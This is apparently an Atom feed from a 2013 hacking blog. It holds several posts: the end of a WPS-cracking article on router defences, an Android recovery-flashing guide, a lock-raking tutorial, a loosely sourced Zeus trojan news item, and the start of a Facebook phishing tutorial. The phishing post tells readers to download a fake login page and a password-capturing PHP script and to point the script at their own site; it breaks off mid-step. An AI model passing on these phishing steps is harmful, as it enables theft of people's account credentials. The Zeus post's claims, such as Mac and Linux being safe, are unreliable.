&lt;blockquote data-textannotation-id=&quot;4677f288c7b935bf587fd4121015a4a6&quot; style=&quot;background-color: white; border-left-width: 0px; box-sizing: border-box; color: #333333; direction: ltr; font-family: Georgia, serif; font-size: 15px; font-style: italic; line-height: 1.5; margin: 10px 0px 19px 18px; max-width: 100%; padding: 16px 35px; width: 638.390625px;&quot;&gt;
&lt;div style=&quot;box-sizing: border-box; direction: ltr; line-height: 1.5; padding: 0px; word-break: break-word;&quot;&gt;
In a phone conversation, Craig Heffner said that the inability to shut this vulnerability down is widespread. He and others have found it to occur with every Linksys and Cisco Valet wireless access point they&#39;ve tested. &quot;On all of the Linksys routers, you cannot manually disable WPS,&quot; he said. While the Web interface has a radio button that allegedly turns off WPS configuration, &quot;it&#39;s still on and still vulnerable.&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div data-textannotation-id=&quot;fe7c4b086485ef031f4644fa593714f1&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
So that&#39;s kind of a bummer. You may still want to try disabling WPS on your router if you can, and test it against Reaver to see if it helps.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;f40ba62eb65986135124d444da682475&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
You could also set up MAC address filtering on your router (which only allows specifically whitelisted devices to connect to your network), but a sufficiently savvy hacker could detect the MAC address of a whitelisted device and use MAC address spoofing to imitate that computer.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;8ff2343685358ae2d82ea7269506fa9a&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Double bummer. So what will work?&lt;/div&gt;
&lt;div data-textannotation-id=&quot;ad0a75469dfee1cf27679fa1593c0656&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
I have the open-source router firmware&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;DD-WRT&lt;/span&gt;&lt;/span&gt;&amp;nbsp;installed on my router and I was unable to use Reaver to crack its password. As it turns out,&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;DD-WRT does not support WPS&lt;/span&gt;&lt;/span&gt;, so there&#39;s yet another reason to love the free router-booster. If that&#39;s got you interested in DD-WRT, check their&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;supported devices list&lt;/span&gt;&lt;/span&gt;&amp;nbsp;to see if your router&#39;s supported. It&#39;s a good security upgrade, and DD-WRT can also do cool things like&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;monitor your internet usage&lt;/span&gt;&lt;/span&gt;,&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;set up a network hard drive&lt;/span&gt;&lt;/span&gt;, act as&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;a whole-house ad blocker&lt;/span&gt;&lt;/span&gt;,&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;boost the range of your Wi-Fi network&lt;/span&gt;&lt;/span&gt;, and more. It essentially&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;turns your $60 router into a $600 router&lt;/span&gt;&lt;/span&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver&quot; rel=&quot;nofollow&quot;&gt;credit&lt;/a&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/3983008578014521919/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/crack-wifi-wpa.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/3983008578014521919'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/3983008578014521919'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/crack-wifi-wpa.html' title='Crack wifi WPA'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-2648867906830252377</id><published>2013-07-29T05:19:00.000-07:00</published><updated>2013-07-30T06:05:12.417-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Android"/><title type='text'>What is a Recovery and How to Flash One. </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;What is a&amp;nbsp;recovery?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
Well recovery is something on android that basically allows you to flash zips which may contain apps, mods or custom roms. Every phone has a specific recovery for it which means you cant use a recovery that is for Galaxy Note II on Xperia Z.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;What does flash mean?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Well flash is basically when you install something using a recovery it is called flash.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Which recovery should I install?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
There are a lot of recoveries out there for your phone but for tutorials on this site we are going to be using &quot;ClockWorkMod (CWM)&quot; or &quot;4ext Recovery&quot; (btw i use 4ext). The Famous 3 recoveries are TeamWinRecoveryProject (TWRP), CWM , 4ext Recovery. But not every phone has these three recoveries available for them some have only CWM or TWRP or 4ext but famous phones such as Note II has all of them.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;a href=&quot;http://1place4tech.com/wp-content/uploads/2013/05/14bits-android-logo-superJumbo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;191&quot; src=&quot;http://1place4tech.com/wp-content/uploads/2013/05/14bits-android-logo-superJumbo.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Downloads&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
You Just Need &lt;a href=&quot;http://www.mediafire.com/download/h9b5aiq48g1s3bq/Android-SDK-tools.zip&quot; target=&quot;_blank&quot;&gt;This&lt;/a&gt;&amp;nbsp;Extract it.&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;How to install a recovery?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Well there are many different ways for installing recoveries on your phone but there are two most common ways&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;A) By ADB Fastboot:&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
This Method is only usable after you have found the recovery you want to install. A recovery is an .img file.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
1.Download The recovery .img you want to install.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
2.Rename it to &quot;recovery.img&quot;.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
3.Copy &quot;recovery.img&quot; to the folder you extracted earlier&lt;br /&gt;
4. Now Press RightClick+Shift and then select Open Command Window Here.&lt;br /&gt;
5.Now just type &quot;&lt;span style=&quot;background-color: #e1e4f2; font-size: 13px;&quot;&gt;fastboot flash recovery recovery.img&quot;&lt;/span&gt;&lt;br /&gt;
6.Done.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;B) By Rom Manager For CWM:&lt;/b&gt;&lt;br /&gt;
This method is only usable if you have root.&lt;br /&gt;
&lt;br /&gt;
1.Go to Googly Play&lt;br /&gt;
2.Search &quot;Rom Manager&#39;&lt;br /&gt;
3.Install it.&lt;br /&gt;
4.Open it and grant it root permissions.&lt;br /&gt;
5.Select Flash recovery and then your Device (If it doesn&#39;t show your device than your device doesn&#39;t have a &amp;nbsp;cwm recovery).&lt;br /&gt;
6.Done&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;C) By Goo Manager TWRP:&lt;/b&gt;&lt;br /&gt;
This is only usable with root.&lt;br /&gt;
&lt;br /&gt;
1.Go to Googly Play&lt;br /&gt;
2.Search &quot;Goo Manager&#39;&lt;br /&gt;
3.Install it.&lt;br /&gt;
4.Open it and grant it root permissions.&lt;br /&gt;
5.&amp;nbsp;Open it and hit menu - Install OpenRecoveryScript.&lt;br /&gt;
6.Select a recovery and hit install.&lt;br /&gt;
7.Done&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;D) By 4ext Recovery:&lt;/b&gt;&lt;br /&gt;
Only usable with root.&lt;br /&gt;
&lt;br /&gt;
1. Go to http://4ext.net and download the free version&lt;br /&gt;
or&lt;br /&gt;
1.Go to Googly Play&lt;br /&gt;
2.Search &quot;4ext Recovery&#39;&#39;&lt;br /&gt;
3.Install it.&lt;br /&gt;
4.Open it and grant it root permissions.&lt;br /&gt;
6.Select &quot;Online Upgrade&quot; say yes if anything pops up.&lt;br /&gt;
7.It should detect your phone and if it detects wrong phone don&#39;t continue.&lt;br /&gt;
8.Select Recovery install it.&lt;br /&gt;
9.Done&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/2648867906830252377/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/what-is-recovery-and-how-to-flash-one.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/2648867906830252377'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/2648867906830252377'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/what-is-recovery-and-how-to-flash-one.html' title='What is a Recovery and How to Flash One. '/><author><name>TheKingOfEmAll</name><uri>http://www.blogger.com/profile/18003915218562093391</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='23' height='32' src='http://2.bp.blogspot.com/-p_iX0mZmqhQ/Ueki9hsAo_I/AAAAAAAAAT8/gkwKOC_Ewfo/s220/tumblr_mohaopxcFE1svd9olo1_1280.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-5565678103871240027</id><published>2013-07-28T05:08:00.004-07:00</published><updated>2013-07-29T05:14:25.541-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Social Engineering"/><title type='text'>How to pick a lock</title><content type='html'>&lt;span style=&quot;font-size: x-large;&quot;&gt;How to pick a lock&lt;/span&gt;&lt;br /&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;p1&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://cdn1.bigcommerce.com/server1900/vca8qna/products/1126/images/528/BDPS_14__56556.1360776459.1280.1280.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;208&quot; src=&quot;http://cdn1.bigcommerce.com/server1900/vca8qna/products/1126/images/528/BDPS_14__56556.1360776459.1280.1280.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;s1&quot;&gt;Lock picking is considered by some to be the original&lt;b&gt; &quot;hack&quot;&lt;/b&gt;. &amp;nbsp;Long before computers there were locks and someone who wanted to manipulate them. The common misconception when picking a lock is that the process is difficult when, in actuality, it is quite simple. There are my methods to picking a lock but for this post we are going to go over the most basic method, &lt;b&gt;“raking”&lt;/b&gt; or &lt;b&gt;“scrubbing”&lt;/b&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;p2&quot;&gt;
&lt;span class=&quot;s1&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot;&gt;
&lt;span class=&quot;s1&quot;&gt;Raking a lock is a simple, yet effective, way of manipulating the pins in a lock to open it without a key and can be achieved by the following steps:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHuZlrccznJ0OVZCIYZHcUIybULKMI23rGfJI5LOY2GdufwLYZS83eJujEJCpwJI0jHAowmbyi68-IzKfnUP0CA8xg8JCm8r-4nqtGZ0pMQhOoyeYVR5RQvUYqJkkbAzLbEKvhEUlDv47f/s1600/Picking-300x214.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHuZlrccznJ0OVZCIYZHcUIybULKMI23rGfJI5LOY2GdufwLYZS83eJujEJCpwJI0jHAowmbyi68-IzKfnUP0CA8xg8JCm8r-4nqtGZ0pMQhOoyeYVR5RQvUYqJkkbAzLbEKvhEUlDv47f/s1600/Picking-300x214.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ol class=&quot;ol1&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6B6xAb0Qm4WEXDSZ_DDBI7zMDG3A3hfvVohRkaK2iZpxVAQkvAVvua3s6Rc5bfeMAszPz0Q-AIlNKT1o96bDrdrZqGvKQWyQNrrZWzcdAh9IqKxbgw757sT5_6Y7ZOxEfooR5-J5toxPV/s1600/Rake-300x128.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6B6xAb0Qm4WEXDSZ_DDBI7zMDG3A3hfvVohRkaK2iZpxVAQkvAVvua3s6Rc5bfeMAszPz0Q-AIlNKT1o96bDrdrZqGvKQWyQNrrZWzcdAh9IqKxbgw757sT5_6Y7ZOxEfooR5-J5toxPV/s1600/Rake-300x128.png&quot; /&gt;&lt;/a&gt;
&lt;li class=&quot;li1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;Insert the rake into the lock and make sure you are past the last pin. I like to push all the pins up so I can feel where the rake is placed in the lock. If you do not have a rake, one can be purchased from &lt;span class=&quot;s2&quot;&gt;Bump My Lock&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;li1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;Insert the tension tool into the lock not to obstruct the rake.&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;li1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;Apply sight pressure on the tension tool in the direction you want to open the lock. This is the most difficult step in the process and will take some time to learn the right amount of tension. When teaching I like to use a rubber band on the end of the tension tool and pull just to when the rubber band starts to stretch.&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;li1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;Try not and touch the walls of the key way and pull the rake straight out in one solid fast motion.&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;li1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;If the lock does not open on the first try don&#39;t fret, insert the rake again, adjust your tension, and repeat the process.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;p2&quot;&gt;
&lt;br /&gt;
&lt;span class=&quot;s1&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot;&gt;
&lt;span class=&quot;s1&quot;&gt;Even though this is a simple way of picking a lock it will still take a good deal of practice and time to learn the skills and movements involved. One great tool for learning how to pick locks is the Lock Pick School in a Box and our Clear Practice Locks; both can be found &lt;a href=&quot;http://www.bumpmylock.com/#oid=1001_1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot;&gt;
&lt;span class=&quot;s1&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.bumpmylock.com/locksmith-school-in-a-box-beginner-to-pro-lock-picking-learning-system.html#oid=1001_1&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://cdn1.bigcommerce.com/server1900/vca8qna/products/1088/images/471/ST_23__95238.1350485139.1280.1280.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;feedflare&quot;&gt;
&lt;/div&gt;
&lt;img height=&quot;1&quot; src=&quot;http://feeds.feedburner.com/~r/HackingAndCracking/~4/VlGBK8Bs8b4&quot; width=&quot;1&quot; /&gt;</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/5565678103871240027/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/how-to-pick-lock.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/5565678103871240027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/5565678103871240027'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/how-to-pick-lock.html' title='How to pick a lock'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHuZlrccznJ0OVZCIYZHcUIybULKMI23rGfJI5LOY2GdufwLYZS83eJujEJCpwJI0jHAowmbyi68-IzKfnUP0CA8xg8JCm8r-4nqtGZ0pMQhOoyeYVR5RQvUYqJkkbAzLbEKvhEUlDv47f/s72-c/Picking-300x214.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-8379916796158082110</id><published>2013-07-28T05:07:00.000-07:00</published><updated>2013-07-29T05:14:50.457-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="others"/><title type='text'>Zeus Virus</title><content type='html'>Zeus Virus&lt;br /&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Bx9a2jrXeE21qk2Kr25eihGix1NbXrVwuT3dZQYzvg7FSss-KBSmgN2rFkrr-0mQ-946I3dtQMytN1XgJs4OfA_7PH75opO-HRaBOivfDIHb9Q-qLz4ap1765Yb2m5CgQwffXsSIfgU/s1600/Facebook.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;248&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Bx9a2jrXeE21qk2Kr25eihGix1NbXrVwuT3dZQYzvg7FSss-KBSmgN2rFkrr-0mQ-946I3dtQMytN1XgJs4OfA_7PH75opO-HRaBOivfDIHb9Q-qLz4ap1765Yb2m5CgQwffXsSIfgU/s400/Facebook.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
The &#39;Zeus Trojan Horse&#39; Virus once again had a come back. According to a resource, it has an ability to drain your Bank accounts easily.&lt;br /&gt;
&lt;br /&gt;
Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised with phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply check-out the video or product by clicking on such links. This way the virus will go viral.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own.&lt;br /&gt;
&lt;br /&gt;
That fake page could then ask for your security information and some other important data that could be easily sold in black market.&lt;br /&gt;
&lt;br /&gt;
According to many sources, perhaps it has been confirmed that those pages are being hosted by Russian Mafia (known as Russian Business Network as well).&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;About Zeus(Virus)&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCjBmNTmqfxLlm6Ao4rIa63TCskB4jB3cs2ulriZcJvD1mdNOBaYSlhRIzdA2LyRfFoGvOj0IojkJpSwfGBqaUgNE6_KtdkaMUgCtgvVmGD7wdBr5KAoVCGLTlhgTK_Fgxh0iTdhyphenhyphenhvgY/s1600/Bank+accounts+hacked.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;212&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCjBmNTmqfxLlm6Ao4rIa63TCskB4jB3cs2ulriZcJvD1mdNOBaYSlhRIzdA2LyRfFoGvOj0IojkJpSwfGBqaUgNE6_KtdkaMUgCtgvVmGD7wdBr5KAoVCGLTlhgTK_Fgxh0iTdhyphenhyphenhvgY/s320/Bank+accounts+hacked.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;The virus is well-known for what it use to do. It was detected once back in 2007, and after that detection it started to spread online. The virus is well-designed so that if you would click on it, the possible and important data like Passwords and Bank Accounts can be stolen easily.&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Does Facebook Took Action Against It?&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.&lt;br /&gt;
&lt;br /&gt;
The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not satisfied well with their response.&lt;br /&gt;
&lt;br /&gt;
Those who are using windows should stay much careful about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux are still safe of this virus.&lt;br /&gt;
&lt;br /&gt;
Some countries like USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate &amp;nbsp;limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.&lt;/div&gt;
&lt;div class=&quot;feedflare&quot;&gt;
&lt;/div&gt;
&lt;img height=&quot;1&quot; src=&quot;http://feeds.feedburner.com/~r/HackingAndCracking/~4/YXmXwsXsC8s&quot; width=&quot;1&quot; /&gt;</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/8379916796158082110/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/zeus-virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/8379916796158082110'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/8379916796158082110'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/zeus-virus.html' title='Zeus Virus'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Bx9a2jrXeE21qk2Kr25eihGix1NbXrVwuT3dZQYzvg7FSss-KBSmgN2rFkrr-0mQ-946I3dtQMytN1XgJs4OfA_7PH75opO-HRaBOivfDIHb9Q-qLz4ap1765Yb2m5CgQwffXsSIfgU/s72-c/Facebook.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-7383863070503174000</id><published>2013-07-21T05:45:00.002-07:00</published><updated>2013-07-29T05:17:55.464-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>How To Hack Facebook Using Phisher Method</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&lt;b&gt;1.&lt;/b&gt;&amp;nbsp;First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords&amp;nbsp;&amp;nbsp;(login.php),&amp;nbsp;You can download both the files from&amp;nbsp;&lt;a href=&quot;http://www.mediafire.com/?da87t03rwytg2t5&quot; rel=&quot;nofollow&quot; style=&quot;text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2.&lt;/b&gt;&amp;nbsp;To get the password click&amp;nbsp;&lt;a href=&quot;http://www.mediafire.com/download/dp5ge406dyj0gt4/File2.rar&quot; rel=&quot;nofollow&quot; style=&quot;text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3.&amp;nbsp;&lt;/b&gt;After you download the files, Open&amp;nbsp;login.php,with a note pad&amp;nbsp;and search for the term&amp;nbsp;www.enteryoursite.com&amp;nbsp;and replace it with the site 